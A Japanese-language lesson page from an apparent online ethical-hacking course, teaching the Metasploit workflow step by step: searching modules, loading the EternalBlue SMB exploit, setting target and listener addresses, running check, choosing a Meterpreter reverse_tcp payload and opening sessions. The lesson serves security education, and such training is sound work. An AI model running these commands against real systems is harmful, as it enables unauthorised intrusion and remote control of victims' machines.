0Pricing
Ethical Hacking Academy · レッスン

エクスプロイトの検索と利用

見つけて実行します

「エクスプロイトの検索と利用」はCoddyKit上の無料Ethical Hacking Academyレッスンです。 これはレッスン2/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはEthical Hacking Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Ethical Hacking Academyコースには全4レッスンが含まれています。

偵察からエクスプロイトへ

スキャン後には、ターゲットのサービスとバージョンが分かっています。次の手順は、それらのバージョンに存在する既知の脆弱性に適合するエクスプロイトモジュールを見つけることです。

Metasploitのsearchコマンドは、数千のモジュールを探すための入口です。正確に検索すれば時間を節約でき、誤ったコードの実行を避けられます。

基本的な検索

searchコマンドは、キーワードでモジュールインデックスを検索します。ソフトウェア名、CVE、サービスなどで検索できます。

search eternalblue
search type:exploit platform:windows smb

検索フィルター

フィルターを使って結果を絞り込みます。

  • type: exploit、auxiliary、post
  • platform: windows、linux、unix
  • cve: 特定のCVE識別子
  • rank: excellent、great、good(信頼性)

フィルターを組み合わせると、数千のモジュールをすばやく数個まで絞り込めます。

search cve:2017-0144 type:exploit

検索結果の読み方

検索結果には、各モジュールのrank、disclosure date、checkインジケーターが表示されます。rankはエクスプロイトの信頼性と安全性を示します。

  • excellent:ターゲットをクラッシュさせる可能性が低い
  • great/good:一般的な条件で信頼性が高い
  • low/manual:危険性がある、または慎重な設定が必要

本番システムをクラッシュさせないよう、rankの高いモジュールを優先してください。

モジュールの読み込み

モジュールのインデックス番号または完全なパスを use で指定します。プロンプトが変わり、読み込んだモジュールが表示されます。データストアには、そのモジュールのオプションが保持されます。

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

モジュールの確認

実行する前に、モジュールについて確認します。info では、説明、参照情報(CVE、アドバイザリ)、必須オプション、対応するターゲットが表示されます。

モジュールの動作を理解することは、専門的かつ責任ある利用の一部です。理解していないエクスプロイトは、決して実行しないでください。

info
show options
show targets

オプションの設定

必須オプションを set で設定します。リモートエクスプロイトでよく使うのは、ターゲットのアドレスとペイロードの設定です。

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

check コマンド

多くのエクスプロイトは check に対応しており、実際にエクスプロイトを実行せずに、ターゲットに脆弱性があると思われるかどうかを安全に確認できます。

最初に check を実行するのは良い習慣です。システムをクラッシュさせるリスクを減らし、実際に見込みのある対象に取り組もうとしていることを確認できます。

check
# [+] 10.10.10.40:445 - The target is vulnerable.

ペイロードの選択

エクスプロイトにはペイロードが必要です。Metasploit はデフォルトのペイロードを選択しますが、ターゲットや必要なアクセス権限に適したものを一覧から選んで指定することもできます。

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

実行とセッション

exploit(または run)で起動します。成功すると、ターゲットへの対話型接続である セッション が取得されます。

複数のセッションは、sessions -l で一覧表示し、sessions -i N で操作します。background でセッションをバックグラウンドに移すと、コンソールで作業を続けられます。

exploit
sessions -l
sessions -i 1

グローバルオプションとモジュールオプション

LHOST など、一部の設定は複数のモジュールで再利用します。setg でグローバルに設定すると、モジュールを切り替えるたびに再入力せずに済みます。

  • set:現在のモジュールにのみ適用されます。
  • setg:モジュール全体にグローバルに適用されます。
  • unsetg:グローバル値を消去します。

多くのモジュールを使う長時間の作業で、時間を節約できます。

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

クイックチェック

エクスプロイトを実行する前に取るべき、責任ある手順を選んでください。

まとめ

エクスプロイトの検索と実行方法を学びました。

  • フィルター(type、platform、cve、rank)を指定した search でモジュールを探します。
  • 信頼性と安全性のため、より高い rank のモジュールを優先します。
  • use で読み込み、info/show options で確認し、set で設定します。
  • まず check を実行し、その後 exploit で セッション を取得します。
  • sessions -l/-i でセッションを管理します。

次は、ペイロードと Meterpreter のポストエクスプロイトシェルについて学びます。

よくある質問

「エクスプロイトの検索と利用」レッスンは無料ですか?

はい。「エクスプロイトの検索と利用」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Ethical Hacking Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Ethical Hacking Academyコースには全4レッスンが含まれています。

「エクスプロイトの検索と利用」で何を学びますか?

見つけて実行します ブラウザで直接実行するハンズオンコードでEthical Hacking Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。

Ethical Hacking Academyを始めるのに経験は必要ですか?

事前経験は必要ありません。CoddyKitのEthical Hacking Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン2/4です。

「エクスプロイトの検索と利用」レッスンにはどのくらい時間がかかりますか?

ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。

このEthical Hacking Academyレッスンでコードを書いて実行できますか?

はい。すべてのEthical Hacking Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。

このコースのすべてのレッスン

  1. Metasploitアーキテクチャ
  2. エクスプロイトの検索と利用
  3. ペイロードとMeterpreter
  4. 侵入後のモジュール
← Ethical Hacking Academyに戻る